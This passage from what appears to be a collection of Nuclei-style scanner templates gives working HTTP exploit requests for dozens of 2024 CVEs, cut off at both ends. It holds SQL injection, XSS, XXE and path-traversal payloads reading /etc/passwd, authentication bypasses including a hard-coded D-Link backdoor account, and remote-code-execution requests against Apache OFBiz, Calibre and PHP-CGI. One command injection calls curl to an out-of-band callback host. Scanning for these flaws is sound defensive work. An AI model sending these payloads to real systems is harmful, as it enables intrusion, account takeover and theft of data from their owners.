{{Hostname}}\n\n_form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["wizardtitletext"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /apps/zxtm/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {[RootURL]}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: {{RootURL}}/apps/zxtm/login.cgi\n\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"_form_submitted\"\n\nform\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_username\"\n\n{{username}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_password\"\n\n{{password}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_submit\"\n\nLogin\n------WebKitFormBoundarycznFUOqD0Y01A9B5--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: /apps/zxtm/","Set-Cookie: ZeusTMZAUTH=","Set-Cookie: ZeusTMZAUTHTIME="],"condition":"and"},{"type":"status","status":[302]}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-26331","info":{"name":"ReCrystallize Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Admin.aspx"],"headers":{"Cookie":"AdminUsername=admin"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ReCrystallize Server Administration","License Status:","System Info</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39914","info":{"name":"FOG Project < 1.5.10.34 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfogguiuser=fog&nojson=2\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"No HTML files!\",\"HTMLDOC\")","contains(content_type, \"application/pdf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /management/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34061","info":{"name":"Changedetection.io <=v0.45.21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","is not a valid AppRise URL"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" value=\"([^\"]+)\""],"internal":true}]}]},{"id":"CVE-2024-8181","info":{"name":"Flowise <= 1.8.2 Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/apikey?/api/v1/ping HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nReferer: {{RootURL}}/document-stores\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiKey","apiSecret"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apiKey","part":"body","internal":false,"group":1,"regex":["\"apiKey\":\"([^\"]+)\""]}]}]},{"id":"CVE-2024-6893","info":{"name":"Journyx - XML External Entities Injection (XXE)","severity":"high"},"requests":[{"raw":["POST /jtcgi/soap_cgi.pyc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///etc/passwd\">]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalid password for user"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27956","info":{"name":"WordPress Automatic Plugin <= 3.92.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nq=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/csv\")","contains_all(body, \"DATE\", \"ACTION\", \"KEYWORD\")"],"condition":"and"}]}]},{"id":"CVE-2024-38288","info":{"name":"TurboMeeting - Post-Authentication Command Injection","severity":"high"},"requests":[{"raw":["POST /as/wapi/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnext_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login\n"],"matchers":[{"type":"word","part":"body","words":["as/wapi/profile_entry?sid="],"internal":true}],"extractors":[{"type":"regex","name":"sid","part":"body","group":1,"regex":["sid=(.*?)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /as/wapi/generate_csr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsid={{sid}}&common_name=1\"%20out%20/dev/null\"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CSR","SSL"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-31750","info":{"name":"F-logic DataCube3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nreq_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq\")","contains(header, \"application/json\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-1512","info":{"name":"MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"items\",\"total\",\"total_price\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38856","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/main/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24809","info":{"name":"Traccar - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /api/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{name}}\", \"email\": \"{{email}}\", \"password\": \"{{password}}\", \"totpKey\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"administrator\":","\"fixedEmail\""],"condition":"and","internal":true}]},{"raw":["POST /api/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\n\nemail={{email}}&password={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceReadonly\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{unique}}\", \"uniqueId\": \"{{unique}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"calendarId\"","\"groupId\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".id"]}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"extractors":[{"type":"regex","part":"body","name":"filename","internal":true,"regex":["device\\.([a-zA-Z]+)"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /api/devices/{{value}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": {{value}}, \"attributes\": {\"deviceImage\": \"device.png\"}, \"groupId\": 0, \"calendarId\": 0, \"name\": \"test\", \"uniqueId\": \"{{unique}}/../../../../../opt/traccar/modern\", \"status\": \"offline\", \"lastUpdate\": null, \"positionId\": 0, \"phone\": null, \"model\": null, \"contact\": null, \"category\": null, \"disabled\": false, \"expirationTime\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceImage\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]}]},{"id":"CVE-2024-29272","info":{"name":"VvvebJs < 1.7.5 - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfile=demo/landing/index.php&html={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"File saved\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /demo/landing/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4577","info":{"name":"PHP CGI - Argument Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"],"body":"<?php echo md5(\"CVE-2024-4577\"); ?>\n","stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["3f2ba4ab3b260f4c2dc61a6fac7c3e8a"]}]}]},{"id":"CVE-2024-3273","info":{"name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auth_state>1</auth_state>"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4443","info":{"name":"Business Directory Plugin <= 6.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"Business Directory\",\"No listings found\")"],"condition":"and"}]}]},{"id":"CVE-2024-21645","info":{"name":"pyload - Log Injection","severity":"medium"},"requests":[{"raw":["POST /login?next={{RootURL}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{randstr}}\\'%0a[1970-01-01 00:00:00]  INJECTED               {{str}}  THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login\n","POST /login?next={{RootURL}}/logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{username}}&password={{password}}&submit=Login\n"],"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td>1970-01-01 00:00:00</td><td class=\"loglevel\">INJECTED</td><td class=\"logsource\">{{str}}</td><td>THIS&nbsp;ENTRY&nbsp;HAS&nbsp;BEEN&nbsp;INJECTED&#39;</td>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5975","info":{"name":"CZ Loan Management <= 1.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"CZ Loan Management\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-22927","info":{"name":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>","id=\"eytime\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1071","info":{"name":"WordPress Ultimate Member 2.1.3 - 2.8.2 \u2013 SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains_all(body_2, \"current_page\", \"total_pages\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([0-9a-z]+)\""],"internal":true}]}]},{"id":"CVE-2024-1210","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"quiz_materials\":","quizzes"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31849","info":{"name":"CData Connect < 23.4.8846 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData - Connect"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6782","info":{"name":"Calibre <= 7.14.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\n    [\"template\"],\n    \"\",\n    \"\",\n    \"\",\n    {{book_ids}},\n   \"python:def evaluate(a, b):\\n  import subprocess\\n  try:\\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\\n  except Exception:\\n    return subprocess.check_output(['sh', '-c', 'whoami'])\\n\"\n]\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["b'([^']+)"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7332","info":{"name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_cste/cgi-bin/product.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"[PRODUCT]\",\"[WLAN]\",\"HostName\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38514","info":{"name":"NextChat - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["__NEXT_DATA__"]}]}]},{"id":"CVE-2024-2330","info":{"name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","severity":"medium"},"requests":[{"raw":["POST /protocol/index.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njsoncontent={\"protocolType\":\"addmacbind\",\"messagecontent\":[\"{\\\"BandIPMacId\\\":\\\"1\\\",\\\"IPAddr\\\":\\\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\\\",\\\"MacAddr\\\":\\\"\\\",\\\"DestIP\\\":\\\"\\\",\\\"DestMask\\\":\\\"255.255.255.0\\\",\\\"Description\\\":\\\"Sample+Description\\\"}\"]}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"XPATH syntax error:\",\"alert\") && contains(header,\"text/html\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["XPATH syntax error: '([~0-9.]+)'"]}]}]},{"id":"CVE-2024-5230","info":{"name":"FleetCart 4.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en/products?query=123"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"razorpayKeyId:\", \"loggedIn:\", \"storeName:\")","status_code == 200"],"condition":"and"},{"type":"word","words":["razorpayKeyId: ''"],"negative":true}]}]},{"id":"CVE-2024-27292","info":{"name":"Docassemble - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/interview?i=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[501]}]}]},{"id":"CVE-2024-22319","info":{"name":"IBM Operational Decision Manager - JNDI Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"patchLevel\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24919","info":{"name":"Check Point Quantum Gateway - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /clients/MyCRL HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*","nobody:.*"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2621","info":{"name":"Fujian Kelixin Communication - Command Injection","severity":"medium"},"requests":[{"raw":["@timeout 15s\nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"msg\\\":\",\"header\\\":\",\"code\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-31848","info":{"name":"CData API Server < 23.4.8844 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - API Server</title>"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6646","info":{"name":"Netgear-WN604 downloadFile.php -  Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloadFile.php?file=config"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["system:basicSettings","system:staSettings"],"condition":"and"},{"type":"word","part":"content_type","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33288","info":{"name":"Prison Management System - SQL Injection Authentication Bypass","severity":"high"},"requests":[{"raw":["POST /Admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=\n","GET /Admin/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<p>Change Password</p>","<p>Logout</p>","Admin Dashboard | Prison Management system"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3850","info":{"name":"Uniview NVR301-04S2-P4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="],"condition":"and"},{"type":"word","part":"header","words":["NVRDVR"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6205","info":{"name":"PayPlus Payment Gateway < 6.6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","regex('^-1$', body)","contains(content_type,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-39907","info":{"name":"1Panel SQL Injection - Authenticated","severity":"critical"},"requests":[{"raw":["POST /api/v1/auth/login HTTP/1.1\nHost: {{Hostname}}\nEntranceCode: ZW50cmFuY2U=\nContent-Type: application/json\n\n{\"name\":\"{{username}}\",\"password\":\"{{password}}\",\"ignoreCaptcha\":true,\"authMethod\":\"session\",\"language\":\"en\"}\n","POST /api/v1/hosts/command/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"page\":1,\"pageSize\":10,\"groupID\":0,\"orderBy\":\"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;\",\"order\":\"ascending\",\"name\":\"a\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"SQL logic error\",\"table exp already exists\")","contains(header_1, 'psession')"],"condition":"and"}]}]},{"id":"CVE-2024-5522","info":{"name":"WordPress HTML5 Video Player < 2.5.27 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-40348","info":{"name":"Bazarr < 1.4.3 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login"],"matchers":[{"type":"word","part":"body","words":["<title>Bazarr</title>","content=\"Bazarr","window.Bazarr"],"condition":"or","internal":true}]},{"method":"GET","path":["{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1209","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","slug\":\"assignment",".pdf\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41628","info":{"name":"Cluster Control CMON API - Directory Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"ClusterControl\",\"CMON_API\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../..//etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0713","info":{"name":"Monitorr Services Configuration - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn\n\n------WebKitFormBoundaryaquxwjsn\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{file}}.php\"\nContent-Type: 